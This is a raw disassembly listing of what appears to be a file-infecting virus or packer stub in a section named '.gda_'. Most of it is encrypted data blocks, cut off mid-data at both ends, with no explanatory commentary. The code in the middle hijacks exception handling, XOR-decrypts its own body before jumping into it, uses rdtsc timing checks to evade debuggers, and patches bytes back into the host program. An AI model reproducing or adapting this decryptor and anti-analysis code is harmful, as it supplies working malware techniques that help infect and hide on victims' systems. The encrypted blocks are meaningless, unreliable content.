0C139B506h, 10238915h, 70584028h, 0D0B8A088h, 301800E8h dd 90786048h, 0F0D8C0A8h, 50382008h, 0B0988068h, 10F8E0C8h dd 70584028h, 0D0B8A088h, 301800E8h, 90786048h, 0F0D8C0A8h dd 50382008h, 0B0988068h, 10F8E0C8h, 70584028h, 0D0B8A088h dd 301800E8h, 0F0786048h, 0CF64652Bh, 0D338203Eh, 86A740CDh dd 0A7F7E0C8h, 23D5546Bh, 9B0FAF90h, 0BBC803EEh, 0BB5C440Ch dd 0E9AACCEAh, 23306233h, 0A4DA0B7Ch, 99F4A2E3h, 4667FCBDh dd 103D2988h, 0DB1836D7h, 0B8BAE34Dh, 32B9194Ah, 0D5B0200Ch dd 0B0AEA424h, 10F88420h, 70472828h, 5535A088h, 302E2391h dd 0E4605911h, 0F41843A4h, 0D5C7D7EAh, 0B0AEBFF4h, 1321170Bh dd 467C0CA5h, 2FA84388h, 3097FC98h, 727C88CBh, 8945495Eh dd 0D338162Bh, 0B5EC8052h, 62FBD2E3h, 8C16CD38h, 53E6FBD0h dd 346C00D2h, 939352B7h, 18C8B257h, 0AFC7DF5Fh, 3DB34E43h dd 10CEDF08h, 44134370h, 703D2F4Bh, 0F71836D7h, 0A647FCCDh dd 0F0D8C0A8h, 5004C808h, 35138068h, 10CEDF54h, 8FAEF0C0h dd 0D0A04877h, 8D9B00E8h, 904E5FD4h, 79D0B5A8h, 661BD595h dd 4F046B68h, 26C77C45h, 0F5D78328h, 0D08E9F28h, 0F849561h dd 9390607Eh, 0C3D8C0A8h, 0C3B3E3C1h, 0B09880E8h, 0EE15089Ah dd 0E55BBFD7h, 0D08E9F48h, 4A9BD6EBh, 14776044h, 0F0D8C1AFh dd 50285A8Bh, 0B0650467h, 5273E0C8h, 0B8B01024h, 0D3475F76h dd 627C06Dh, 0C0BE6348h, 958C822h, 0D0215408h, 0B3ECAE91h dd 9B090B88h, 91D94160h, 0F677F57h, 7C5CF969h, 7C0D6004h dd 7310EBF1h, 0DF37DAF1h, 0B09880DFh, 0EE8061AEh, 0F557721Bh dd 0D0B8A023h, 302283BEh, 0DAF3653Dh, 7BDA2BB8h, 1C92302h dd 4F66F280h, 0D04DE337h, 0DD587617h, 2BC0600Dh, 309C84E7h dd 25876048h, 0F0EEFF68h, 0AE6DC858h, 359B7F97h, 10CEDF08h dd 4F98C5A7h, 0D4BBA0BEh, 0F09B53CCh, 9FA3534Ah, 0E23BC81Eh dd 318E988h, 0B4BCA4A9h, 39DCFCE1h, 30036424h, 2B394963h dd 0EDA3D7E7h, 6BF95E3Ch, 2BB68500h, 0ABB9167Ch, 4F39BB31h dd 0EB79CEBCh, 0DCED62FEh, 2B3986FCh, 0C340E97Bh, 6BF97E3Ch dd 38029D5h, 0ABB9367Ch, 51BDBF2Eh, 0EB79EEBCh, 917D7F18h dd 4547A6FCh, 302E3F48h, 6F098913h, 73863F57h, 0BFD134CAh dd 73677F96h, 48FC8ACAh, 8FAD10C0h, 0F62D2877h, 561836CEh dd 926051F0h, 0F33C004Ah, 0FB5EC20Ah, 58C08602h, 0EF0715FDh dd 0F75082ABh, 88BDCA59h, 0CFED2800h, 9382E0B7h, 0A068CBDBh dd 761EA50Ah, 5B32805Eh, 48908AEFh, 73A2C082h, 0C108B8FDh dd 0CFED0800h, 9079D8B7h, 225CC0A8h, 0B0E92D7Ch, 46734A96h dd 1040E523h, 0DBD84028h, 5D7B1F6Ah, 620987Dh, 67AF4B48h dd 752F0372h, 500E1883h, 0B8988068h, 0D13875C7h, 0F5AE4BC8h dd 0D08E9801h, 561E75E9h, 7B5DE945h, 795D36BBh, 52381630h dd 0BDFE861Dh, 1413C5F9h, 55594D4Eh, 6C500BEEh, 0BBE7FF17h dd 5F1540Bh, 0F0EEFF1Ch, 0D5CFE3A3h, 0B0AEB8E3h, 18F8E0C8h dd 7498D527h, 4C500A34h, 0B9E7FF17h, 0A647D8DDh, 795D36A8h dd 51381630h, 8197841Dh, 0D0D3E223h, 0F5AF8383h, 0D08E9803h dd 381800E8h, 15F2473Ch, 0F0EEF82Dh, 3633C0C9h, 0D6DD0B65h dd 0BA005063h, 48DDC5A2h, 3079A0BEh, 547F05F3h, 0A3D366C1h dd 1B73A668h, 0DF5C981Ah, 3A33806Dh, 26C0654Dh, 0B1004428h dd 1313B868h, 10F3FC58h, 9093D82Eh, 0E9336BCEh, 0B8602462h dd 4F677471h, 0D12AE445h, 753E48C8h, 7BDE6001h, 0A0A80303h dd 0C87A0AE2h, 0F2CC040h, 24EAA4F7h, 0E890EA5Ah, 0EF0B1420h dd 292BED7h, 2E7DD44Bh, 0CED17422h, 6EA31482h, 0ED4B462h dd 0AE3454C2h, 94F4A2h, 0A0350B31h, 0C091ABD5h, 607D4B7Dh dd 0F3D9EB10h, 0A8E0DDC5h, 752FC09Eh, 500E1883h, 30988068h dd 7048E3BCh, 0FBDDB782h, 0D0B896B0h, 441000E8h, 1B2DD84Fh dd 0BF73C044h, 68B3A5FFh, 0B09B805Eh, 94F7E1C8h, 705840FFh dd 7B124838h, 0FBCBD61h, 78C8607Eh, 4D516B02h, 500E1FA0h dd 8813059Fh, 10FBE0FEh, 652C4028h, 0E833257Fh, 301800DEh dd 950C6148h, 0F260140h, 0FAD190F7h, 141D0BC3h, 9BF8D6F7h dd 0F9906BE7h, 0E6870C35h, 0CC5089E8h, 6F1C07F0h, 30EB6B9Eh dd 0D5CF8B6Eh, 0B0AEB8E3h, 10F8E0CBh, 0F5AE4E5Ch, 0D08E9801h dd 0D81D7468h, 6F879E0Ah, 79BCA710h, 900B8B2Eh, 356F2B0Eh dd 10CED843h, 7058402Bh, 554EF5FCh, 302E3861h, 787D15C8h dd 0F273EB6h, 0AFC584E0h, 58B83097h, 0EF071B7Eh, 0C83E79CBh dd 7BDEB577h, 0A593AB79h, 904E58C3h, 322F125Fh, 5038200Bh dd 0CE70941Dh, 0A0071F35h, 8BC8A837h, 68DE5F77h, 9B7E1517h dd 5FF3CBD9h, 0CF744523h, 9813203Eh, 4764C8E1h, 26C06B4Dh dd 70584328h, 2796D488h, 6208B6Dh, 90786048h, 7FAB4AEh dd 6600AB8Dh, 0B0988068h, 0F8FD95C9h, 8FA7BDDAh, 0E833257Fh dd 301800DEh, 950C6448h, 0F26CD40h, 0DBBDD7F7h, 0B498B650h dd 64F8E0C8h, 8E3FA83Fh, 0F9005F77h, 9BD0FE28h, 0E4B868F0h dd 85606BACh, 0FB5FCBF0h, 8813059Fh, 10F0E0FEh, 3F2D4028h dd 0E8311D08h, 441800DEh, 6E43880Eh, 0D9603F57h, 5AF10910h dd 86A005CDh, 131C20C8h, 48DDE522h, 6013A0BEh, 0B592AA59h dd 904E58C1h, 0FA987002h, 6600A58Dh, 8FE2A68h, 950F1D2Ah dd 706E78A3h, 0D0B8A098h, 79A8079Ch, 0E5C006E2h, 4073A654h dd 900B8AE0h, 202509C3h, 0E7F8D6F7h, 4660CBADh, 0D0B88088h dd 801175E8h, 13FD6A10h, 5AD8F690h, 90B9986Eh, 8813059Fh dd 10B8E0FEh, 732C4028h, 0DA906408h, 620834Dh, 19D30648h dd 0C6E75415h, 0D5CF8B08h, 0B0AEB8E3h, 50F8E0C8h, 20E8495Dh dd 0E83B258Ah, 0C7B200DEh, 0A640EBCDh, 0F0D840A8h, 0E0335508h dd 341D8AD0h, 0BAF8D6F0h, 0C83E7DC3h, 554FB8B9h, 302E3863h dd 90786148h, 0D968C2DCh, 68BC8502h, 5458805Eh, 945DEACBh dd 16587610h, 5100C623h dd 0BB9DF718h, 90785670h, 85D8C0AAh, 5AF0940Ah, 86A004CDh dd 995386C8h, 4667F095h, 0F8201888h, 0C7B300E8h, 0A640EBCDh dd 0F0D8C8A8h, 0B8495408h, 4F677D59h, 2873653Fh, 7458401Eh dd 0DBCDA088h, 0B512B858h, 904E58CDh, 7952B02h, 6600AB8Dh dd 0B0908068h, 76E995C8h, 7AB8C390h, 0E680252Dh, 3B366E8h dd 8593CA88h, 0E8F178CEh, 68BD8502h, 5458805Eh, 955DEACBh dd 16587610h, 5B3D5723h, 301836D0h, 0F6786058h, 84184110h dd 58FCA00Bh, 881D2562h, 0BB9EE0FEh, 0F9DDF627h, 7BB896B0h dd 0CFE4C000h, 1BFD97B7h, 0F0D8F690h, 24782008h, 0B2C83061h dd 26C0634Dh, 0F5AFEA28h, 0D08E9803h, 301820E8h, 920DE6F8h dd 0BF55C4ACh, 0D39DAAF6h, 3998B650h, 26C77845h, 0F0F32628h dd 0D7CDA574h, 7F980058h, 78D220B7h, 0F273CD1h, 68B3A5FFh dd 0F098805Eh, 0A89EE0C8h, 722D714Eh, 7BDE893Ch, 0B5121858h dd 904E58CDh, 5ADB2068h, 0AFC474E0h, 47103097h, 26C06B4Dh dd 70D84028h, 60BAD588h, 0B3BD8A6Eh, 0F6785670h, 0F5244003h dd 5088277Dh, 0F067CFE8h, 0ECD30862h, 0F5AFBFD7h, 0D08E9803h dd 301900E8h, 0D0C86B3Dh, 0C85B45A2h, 0BB92203Eh, 3320E667h dd 935DEA08h, 16587610h, 7AB91023h, 893851Fh, 9078607Eh dd 0DFADC0AAh, 68B3A5FFh, 0B098805Eh, 0A8DE0CCh, 0F5528098h dd 0D08E980Dh, 892A562h, 70B9607Eh, 9660A6B8h, 50888B89h dd 0F0288883h, 287D65C2h, 87F2401Eh, 0E6802B0Dh, 381800E8h dd 0F6681548h, 0FA304310h, 6600A4ADh, 33E668h, 0A0F00BC9h dd 0F4DD4A60h, 7AB896B0h, 893851Fh, 9078607Eh, 8569C0B8h dd 0E85E057Dh, 159278EBh, 10CED84Ch, 0B06BEB4Eh, 48058922h dd 0C71836D7h, 0A640EBCDh, 0D0D8C0A8h, 0E1275508h, 0D6836B1Fh dd 1AE0E970h, 4660C48Dh, 0D35C6088h, 89CA5E2h, 3B1E607Eh dd 0CF407D81h, 91B2203Eh, 8F0025E2h, 0BB9EE0FEh, 0F55A1898h dd 0D08E980Bh, 0BB9DF742h, 93785670h, 84D9C0A8h, 0DBBDD72Ah dd 0B098B650h, 65FCE0C8h, 0FBDDB73Eh, 0D0B896B0h, 451B00E8h dd 6AFC884Dh, 5B303F57h, 0A7C7DFF2h, 86A00BEDh, 10F8E0C8h dd 0C05B3420h, 554F0A41h, 302E3863h, 10786048h, 0F768E0DCh dd 68BBA522h, 5059805Eh, 1871EDD2h, 0D55A400Ch, 0D08E980Bh dd 0B01BE428h, 20D3648Ch, 48BE6AC9h, 0F532C0F7h, 0B0AEB8EBh dd 950F4BAEh, 706E78A3h, 0D0B8A0A8h, 0B5EF539Ch, 904E58C3h dd 0D0D8C0A8h, 97CF2D7Ch, 0B098806Bh, 8048E5BCh, 0FBABAB82h dd 40352B4Fh, 1B1836D7h, 6C39E989h, 75D29818h, 500E188Bh dd 3B1D77C2h, 10F8D6F0h, 4580028h, 8000C684h, 0B39D0A2Bh dd 7B785670h, 0F60A6A2h, 0D39D2AE8h, 0D698B650h, 9B7D1763h dd 73587610h, 0A4B9A088h, 0BB9DF79Bh, 90785670h, 84F8C0A8h dd 53FFD705h, 0C4988068h, 0BA6850CDh, 0BFD3B3C3h, 0EF102503h dd 0F83300DEh, 0A38428C1h, 7B5D3761h, 50381630h, 0C5980068h dd 937D6DC6h, 0FA587610h, 2938E080h, 0BDE073EBh, 0B43CAD4Ch dd 1019C0B8h, 0FBB39000h, 8FE868Bh, 0BB9E20F9h, 0F0D7F84Eh dd 0D0B818E0h, 56F902E8h, 15D338E3h, 96DEB561h, 36F811B0h dd 1A5B30C3h, 28606545h, 0F5AF401Eh, 0D08E9803h, 201800E8h dd 0BB2F663Dh, 0E9339850h, 7B107383h, 3B48AB90h, 26C75045h dd 0E0CD4128h, 0D1B896B7h, 145C8BD1h, 0F8C5E94Ch, 7BD8F6B8h dd 6607B4B5h, 201DAB68h, 0E7F8D6F7h, 4660CBADh, 0D0B8E088h dd 0C71A74E8h, 94BACB90h, 738F96A8h, 6607E8B5h, 34978068h dd 10F8E111h, 70584DC0h, 82FDEB88h, 35445A6h, 0DC3C4E7Ah dd 6527C0E4h, 500E1B72h, 8F4405E1h, 9BABE0FEh, 0A85B7C70h dd 5B90D377h, 0D0F034ABh, 1B879FBDh, 0C6E77C3Dh, 123B7B08h dd 501D0964h, 13F8D6F7h, 0F5D1486Ah, 0D08E9F6Ch, 0CF307363h dd 9078E0FBh, 56128A8h, 0EDB3DFF7h, 0B0AEBFD4h, 0E555089Eh dd 0E5D3BFD7h, 0D08E9F34h, 33104A63h, 5E536C02h, 0FFDD292Bh dd 50394080h, 0EA1C8F68h, 13F8E0C9h, 4667809Dh, 500DA388h dd 9C1836D7h, 15778874h, 0F0D8C00Ah, 7B3C6685h, 86A700EDh dd 40FEE3C8h, 8FAD2AC0h, 6C052377h, 301836D7h, 0D7436B3Dh dd 0EB5BCFA4h, 0BB382009h, 0C0DB964h, 1FF8D6F7h, 70594DADh dd 503DA388h, 561836D7h, 0B58758C9h, 0F02445A7h, 10B32008h dd 84DBAB6Ah, 0E5D50898h, 0CD61BFD7h, 0D08E9F34h, 30FC85E7h dd 157B6048h, 0F0EEFF68h, 6FB8A50Bh, 0B013805Eh, 1FF4A7E3h dd 70588DAAh, 0D8FF9B88h, 30DC83E7h, 50FB6048h, 0E49FC3AAh dd 6FB8A50Bh, 0E0CA805Eh, 2F245537h, 0E5A7401Eh, 0D08E9BB2h dd 3FD885B2h, 9078D7CDh, 0F04429A8h, 0AF042008h, 0B00C0567h dd 2E78E0C8h, 0FBDD4F3Dh, 5BB8A088h, 733301AEh, 2C90307Ch dd 0C9273F5Ch, 66079CB5h, 0B3EFF568h, 26C7204Dh, 0F0DD4328h dd 59B896B7h, 627E86Dh, 0AB78EB48h, 0C6E7202Dh, 6B305208h dd 86A764EDh, 2D9192C8h, 584028h, 0CF5097FAh, 0BD1800E8h dd 51F39C06h, 0B2DBC283h, 0B8BD1B18h, 0C598B657h, 3C63C4h dd 34D771D7h, 3BD9BCACh, 0B597C3F3h, 904E5FE8h, 706D4BC8h dd 0B8381637h, 4F677532h, 10F849A9h, 7E2DC028h, 0A2B4E7A3h dd 385F3BE1h, 6F44E247h, 0FF913F57h, 0AFC6928Dh, 94A40B97h dd 38734749h, 8FA74028h, 9253DF77h, 503C4A69h, 0DE986048h dd 0FC53009Bh, 98BDA72Ch, 3998B657h, 26C7244Dh, 0FFE1CD28h dd 0D3B8A0A0h, 627806Dh, 35DD0648h, 0F31EEBE6h, 1213344Ah dd 4BDE4664h, 43792720h, 75584028h, 59B8A088h, 6E47FCAEh dd 587378Bh, 0F0EEFB2Eh, 5F27C8C9h, 0B0999AEDh, 7AACB0C8h dd 8FA72A00h, 0E683461Dh, 6FD885E8h, 917DE847h, 0AA30C0A8h dd 0B8C7DFEDh, 0B0988079h, 568C859Bh, 233D2C41h, 0A2CDC3EDh dd 71617481h, 0C4CD9F48h, 0FD8F697h, 66031A9Dh, 0EC1D0968h dd 0F8F8D6F7h, 70584031h, 0B1ECC5DBh, 47576583h, 0E30A0526h dd 0A0A8A9C0h, 394E497Ah, 0D5FFE504h, 3B10B7C8h, 98A7BFC1h dd 0D0B8A09Bh, 554A65BBh, 0E217143Bh, 99AA90CDh, 3554497Eh dd 0E798E50Fh, 0EF11ED20h, 704AA8D7h, 0B5EBA088h, 5B7B61AAh dd 0E228103Dh, 9CB1B6C1h, 505D476Dh, 5868683Fh, 8101F37h dd 23584028h, 0B1D0E3EDh, 7E7D6786h, 0F6111427h, 99AA90D1h dd 3554497Eh, 0E798E50Fh, 0EF102D20h, 0FD0C10D7h, 0E682380Dh dd 607C6AE8h, 6F2F6122h, 0C6E3323Dh, 7404A908h, 8BB61597h dd 0D0D2E0FEh, 4E08FDA5h, 80E8A0BEh, 0A8ADFFB8h, 0F8785672h dd 0F0DCC0A9h, 7394A5Ch, 8FC41597h, 7AACE0FEh, 0E5A7172Ch dd 0D08E9FD4h, 0CF0CC46Bh, 0A64734FDh, 9A4D3FA8h, 0F381633h dd 0E02D0DABh, 46F8D6F6h, 4B36D5D7h, 283BA0BEh, 8B9C0F17h dd 19786048h, 0C6E7A02Dh, 6384A08h, 8B321597h, 0D07DE0FEh dd 70FCC427h, 1093A088h, 337250B8h, 0F8790A18h, 30D8C0A8h dd 1AADDF5Eh, 3398B653h, 94F71F30h, 705845C0h, 0EFDC2501h dd 0BD9500DEh, 904E5F20h, 0CFA85525h, 269203Eh, 4FC88002h dd 26C3965Dh, 8FA0C328h, 0D50E2487h, 307200E8h, 0AF1CD5B7h dd 6527C09Eh, 500E1B7Ah, 0BF6778EBh, 10FD7F4Ch, 8DDC928h dd 0E3B896B7h, 61DB0321h, 94123118h, 946D3FF9h, 0AF381637h dd 86A3CEFDh, 1F3865C8h, 705D3BACh, 59719388h, 6277C6Dh dd 0C1293148h, 0FFD8DFC0h, 0C5C77008h, 0B0AEBBFEh, 94F7204Dh dd 7058451Ch, 0EF382501h dd 88DB00DEh, 90780FA7h, 7E08B23h, 6600AB8Dh, 0B0988068h dd 13FE95D8h, 464828ADh, 0D36A9388h, 0C7E9F729h, 1CFDE9A9h dd 48D8F697h, 5038089Fh, 0B3A4CBE3h, 26E8884Dh, 738A7328h dd 27495749h, 0B49D8909h, 53785677h, 0F69377A7h, 0DD0DC3F1h dd 797983Bh, 0C0FBF48Bh, 58992B61h, 0EA39708Bh, 5E7177B7h dd 136514B1h, 82D9CCD2h, 6C73ABE8h, 0B38CC2E3h, 5475F08Ah dd 0A9AFBF60h, 558361ABh, 302E3F90h, 0B42CEB8Bh, 7F18F3B8h dd 5038988Ah, 7F134368h, 0AD75EB23h, 706E7E78h, 0E3672B74h dd 5124AC21h, 0EA44663Ah, 0D0F4C2DFh, 24641CA2h, 0C4B6BC84h dd 65F8DC15h, 0FB91A3C0h, 88FD9D89h, 3B6C00ADh, 0C23B3375h dd 0C35DCFA8h, 0DBC7DFF7h, 0F9CFBD6Bh, 94F7A386h, 8FA7BF0Eh dd 85FBF7B5h, 2B9C0FA6h, 0AD879FB7h, 0C2EB83FFh, 0AF28A407h dd 0E0A57F97h, 1FB7B49Bh, 8FA745ACh, 38639377h, 0CFE7FEC5h dd 6A90703Dh, 18273F54h, 0AFC7DE29h, 4E740467h, 0C2CB1F37h dd 705856C0h, 2FDB4888h, 30F0FF17h, 0CD786048h, 0C3E12D29h dd 8BD1203Eh, 0D498806Bh, 0A573D237h, 706E7FA8h, 0B69A29ECh dd 6A553E69h, 93BCE547h, 0AE53C0A8h, 36E62334h, 0F5C8BBE9h dd 134C65C7h, 33AF4028h, 0D098A09Eh, 979D0FE8h, 6678604Bh dd 0FFDA9CEBh, 503BBD8Ch, 0B8DB0B68h, 0B05840F5h, 0FFDC4F88h dd 0EDB8A08Bh, 103820C8h, 93FCE447h, 4930C0A8h, 5FC7DFF6h dd 0B09BF9EAh, 0D45D63C8h, 70587617h, 5BB0E203h, 0F13310A2h dd 504B643Bh, 38DBC543h, 0D9286A81h, 86A708EDh, 1CB2E3C8h dd 71584090h, 7A50F188h, 0E7FF0Fh, 0A640E9DDh, 0C0F871A8h dd 6600AABDh, 4EB8EA68h, 480B801h, 8FBFD0C0h, 0DF6A2577h dd 0D2CBC27Ch, 0A8F3F579h, 1533C09Eh, 68B3A5FFh, 0B098805Eh dd 328CE1C8h, 48D3C5DFh, 0D0BBA0BEh, 3C6D00E8h, 0A8F3C5C9h dd 0F27C09Eh, 5AD3DBF7h, 88130DE9h, 10F8E0FEh, 76304828h dd 89B8A088h, 30180680h, 0D2903848h, 7A273F4Fh, 6600A38Dh dd 9A1C0668h, 10CED84Bh, 48DBC5A0h, 305AA0BEh, 893851Fh dd 9070607Eh, 0F9ADC0A8h, 68BD9D88h, 0C499805Eh, 9B7D170Dh dd 70587610h, 0A4B0A088h, 0B3A580F3h, 95785670h, 4D5870DCh dd 500E188Ch, 303FF46Dh, 26C06575h, 0EE2C4528h, 0E833257Fh dd 301800DEh, 990CE048h, 0C85B7D28h, 273A203Eh, 783D03E1h dd 10F8D6F7h, 8FAB47C0h, 2DD94877h, 40F0FF17h, 1B78604Ah dd 0C6E74435h, 0D8A52308h, 5898B657h, 0EF071CB1h, 7208C427h dd 6533A088h, 302E3F68h, 93443EC3h, 0DA22876h, 0D237DFF7h dd 0B0988252h, 70DCAA49h, 0FBB84028h, 0D3EEF276h, 4A1B1492h dd 1BFD9758h, 0F0D8F690h, 25282008h, 7C25097Ch, 9DF8D6F7h dd 4660D89Dh, 0B8352B88h, 0C31836F8h, 0B6C137ECh, 7DD8C0A2h dd 662820BDh, 13D7368h, 0E3FA03C8h, 0FBDDB78Ch, 0D0B896B0h dd 3F0800E8h, 9078CECCh, 0D8AB3FA8h, 0AFD696E0h, 0C0D0B97h dd 95F8D6F7h, 0E8DC4FFAh, 5BB8A088h, 627805Dh, 8032EB48h dd 90FC8A29h, 7BD82008h, 0B2EB8822h, 62FB29FBh, 18D57B3Ch dd 5BB89698h, 6086865h, 1B2E1248h, 555BE494h, 500E3060h dd 0D83F0368h, 10F8E0C8h, 71503AA3h, 27BBA8C2h, 0B593F76Fh dd 904E5FDCh, 0C853455Fh, 5078203Eh, 0B2EC8068h, 62FBF83Fh dd 0F9686924h, 0E687683Dh, 186B8BE8h, 158F5049h, 0F0EEF823h dd 50382048h, 0A86F821Ch, 0ECB10899h, 9B01BFD7h, 0F8CBA384h dd 611472C3h, 0CFDC931Eh, 686D4DF1h, 0D9381630h, 86A74CD5h dd 4F5C13C8h, 0E2694F76h, 0D06C2705h, 0A52200E8h, 904E58C1h dd 22B1C6DDh, 420C7670h, 5868D0E0h, 0EF073A73h, 7C12CB72h dd 27A8EA8Bh, 6208B6Dh, 90786048h, 0F5994DB8h, 0DDB1337Dh dd 0B0AEBFA0h, 9065CBh, 0D7DB401Eh, 0D0B8A0E0h, 185B2BE8h dd 902BE7C1h, 752FC0A8h, 500E1C40h, 0B0988069h, 533FE7BCh dd 0D0F8E020h, 5B3D5728h, 301836D0h, 0E4F86048h, 8A3092AFh dd 0AC7DFFFh, 8F500DE3h, 151BE0FEh, 9B700BA1h, 14352B85h dd 0D31836D7h, 1B7B8B4Ah, 752FE8E3h, 500E1883h, 0B098806Bh dd 9573F4BCh, 706E7FE4h, 0EF002D8Bh, 0B51B00DEh, 904E5FFCh dd 0BA53C8A9h, 0D4BDAB18h, 8998B657h, 138BE882h, 71500AA1h dd 0B33BB0CAh, 0B59300B0h, 904E5FC4h, 0F0F058C0h, 587A2108h dd 0E0DB8131h, 28717542h, 0F5AF401Eh, 0D08E9803h, 201800E8h dd 1D7B663Ch, 0F0EED0C0h, 0D5CF20BEh, 0B0AEB8E3h, 10FAE0C8h dd 0B6A6545Dh, 0E833257Fh, 301800DEh, 960D604Ch, 0C8527522h dd 0D5CF203Eh, 0B0AEB8E3h, 10F8A0C8h, 77D24B5Dh, 0D212628Ah dd 0DBEFE23Eh, 0A27FEA41h, 26DA6A6Ah, 820BD7EAh, 0D4BA0B0Ch dd 93A0E247h, 46672495h, 54B7A088h, 0CFE7FA36h, 0AFF8D5B7h dd 6527C09Eh, 500E1BB2h, 8FE43597h, 8507E0FEh, 706E7B06h dd 0EFD02D05h, 0A59500DEh, 904E5F38h, 0F0B292F9h, 6F5C95F7h dd 2567805Eh, 10CEDB66h, 4F3CF5D7h, 4547A0BEh, 302E3BC6h dd 0AE28D5C5h, 4527C09Eh, 500E1F68h, 1A0D7F3Eh, 93F8D6F3h dd 4667248Dh, 387BA088h, 301800E8h, 11790A15h, 0C6EF5645h dd 5FC87808h, 0A5EC05A9h, 0D07DE0FEh, 8F90C3EBh, 5579AF78h dd 302E159Ch, 90685D8Bh, 0ECADC082h, 7444A16Eh, 0C5E9EC64h dd 0D41080DBh, 5A7BFD7h, 2A6C488Dh, 0E2F0FF17h, 0F1879FB7h dd 88F53F86h, 0E82A145Eh, 0B098804Dh, 0EF5D08A8h, 492DBFD7h dd 0E09CE403h, 0E48B565h, 0C0F3607Eh, 0CA59A6A0h, 754B220Eh dd 0B098E83Eh, 0D473E037h, 200A4042h, 0EB423577h, 0F49B00DEh dd 0CC46E140h, 8584FF97h, 54FEA30Bh, 4F620180h, 0EF870837h dd 0B339BFD7h, 0D0B8D430h, 88A9EBE8h, 90786067h, 0F0D8DD40h dd 5018E208h, 0B098B0D0h, 10E808C8h, 549A4028h, 0D13D1888h dd 33F000E8h, 52786048h, 0A455C084h, 7EF52C2Ch, 0CC9878EBh dd 101080D1h, 0FB584028h, 8D8884DCh, 0DD991A63h, 904E5825h dd 0F391440h, 54FA41F7h, 0B19F8668h, 38FAE3CDh, 93F99FADh dd 3815FF6Ah, 8D004432h, 49h, 1CDh dup(0) dd 0EB690000h, 77E7h, 13DEh dup(0) db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp call loc_3143A013 call sub_3143A0BD jmp near ptr byte_3143A070 ; --------------------------------------------------------------------------- loc_3143A013: ; CODE XREF: .gda_:3143A004p push dword ptr fs:0 mov ds:dword_3143A071, ebp mov fs:0, esp xor eax, eax push 80000000h push eax push eax push eax push 80000000h push 40h push eax push 1000h push 20h call ds:dword_3142808C ; LoadLibraryA xor ebx, ebx push ebx push 4 push 10h push ebx push ebx push 800h push 80000000h push ebx push ebx push 200h call ds:dword_3142808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_3143A070 db 0BDh ; CODE XREF: .gda_:3143A00Ej dword_3143A071 dd 12FFC0h ; DATA XREF: .gda_:3143A019w ; --------------------------------------------------------------------------- sub eax, eax loc_3143A077: ; CODE XREF: .gda_:3143A07Dj dec al or al, al jz short loc_3143A081 jnz short loc_3143A077 jmp short loc_3143A0E8 ; --------------------------------------------------------------------------- loc_3143A081: ; CODE XREF: .gda_:3143A07Bj call $+5 pop esi add esi, 44h sub ebx, ebx or ebx, 2898h cld mov edi, 82h push esi loc_3143A09C: ; CODE XREF: .gda_:3143A0ACj xchg al, [esi] xor ax, di mov [esi], al cld add esi, 1 sub ebx, 1 or ebx, ebx jnz short loc_3143A09C pop esi mov edi, [ebp-8] mov fs:0, edi leave jmp esi ; --------------------------------------------------------------------------- db 2 dup(90h) ; =============== S U B R O U T I N E ======================================= sub_3143A0BD proc near ; CODE XREF: .gda_:3143A009p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_3143A0BD endp ; sp-analysis failed ; --------------------------------------------------------------------------- dw 0E8h dd 8B000000h, 89FC2404h, 2FCB98h, 8680F700h, 28h, 8B800000h dd 7404245Ch ; --------------------------------------------------------------------------- loc_3143A0E8: ; CODE XREF: .gda_:3143A07Fj sub eax, 0CFB08959h das ; --------------------------------------------------------------------------- dw 0 ; --------------------------------------------------------------------------- push edi pop dword ptr [eax+2FD3h] cmp byte ptr [eax+288Ah], 0E8h jnz short loc_3143A10D add ebx, [eax+288Bh] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3143A115 ; --------------------------------------------------------------------------- loc_3143A10D: ; CODE XREF: .gda_:3143A0FEj mov ebx, [eax+288Ch] push dword ptr [ebx] loc_3143A115: ; CODE XREF: .gda_:3143A10Bj pop ebx push ebp mov ebp, eax sub dword ptr [esp+4], 80CEh sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+363898h] mov ecx, 0 rep movsb call sub_3143A18B mov ecx, eax call sub_3143A18B sub eax, ecx jz short loc_3143A15F cmp eax, 100h ja short loc_3143A15F lea eax, [ebp+3610D4h] mov dl, [eax-10h] call sub_3143A18F jmp short loc_3143A19E ; --------------------------------------------------------------------------- loc_3143A15F: ; CODE XREF: .gda_:3143A146j ; .gda_:3143A14Dj test dword ptr [ebp+36388Bh], 80000000h jz short loc_3143A189 lea esi, [ebp+36388Fh] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FD4h] mov edi, [ebp+363FD8h] mov ebx, [ebp+363FD0h] loc_3143A189: ; CODE XREF: .gda_:3143A169j pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3143A18B proc near ; CODE XREF: .gda_:3143A138p ; .gda_:3143A13Fp rdtsc retn sub_3143A18B endp ; --------------------------------------------------------------------------- db 7Dh ; =============== S U B R O U T I N E ======================================= sub_3143A18F proc near ; CODE XREF: .gda_:3143A158p mov dh, dl mov ecx, 27B7h loc_3143A196: ; CODE XREF: sub_3143A18F+Cj xor [eax], dl inc eax add dl, dh loop loc_3143A196 retn sub_3143A18F endp ; --------------------------------------------------------------------------- loc_3143A19E: ; CODE XREF: .gda_:3143A15Dj cld sbb [edi+4], esi mov ss, word ptr [ecx] jmp far ptr 2AB5h:37B62B93h ; --------------------------------------------------------------------------- db 0A2h ; --------------------------------------------------------------------------- pop ebx push ecx cmpsb retf 0C446h ; --------------------------------------------------------------------------- inc ecx retf ; --------------------------------------------------------------------------- dd 0B1F633D4h, 274F906Ch, 0EF58F01Bh, 0F6411FFBh, 0F08E5B08h dd 6EB3F7DFh, 0C7BC83F0h, 0DF87A7E4h, 2A15AA3h, 3E4845BAh dd 7BDE2FC6h, 0CCB440D3h, 0E1F87141h, 9DBD10B6h, 9D434E1h dd 0FA360B74h, 0EE0F7335h, 0D2E2176Ch, 32AEE3E4h, 0CE51D45Bh dd 0B12AA408h, 0D858F45Ah, 0AA48DC57h, 17F75B74h, 0A42EB69Eh dd 8604640Fh, 8BE8003h, 0B851592h, 0C801EAEh, 5D91DABh dd 0CF44862Ch, 3EF77FF5h, 32B53553h, 52CC6BAFh, 6EEE41EFh dd 61E366D2h, 0FDD608F9h, 0C0FC75A9h, 26DC648h, 0DE61E7A4h dd 565A18DEh, 39B6334Ch, 8CA83F13h, 2B31820Ch, 23A0A7EBh dd 16199C1Ch, 0BC18BDAEh, 6A748507h, 4D25CD04h, 0EB176CD9h dd 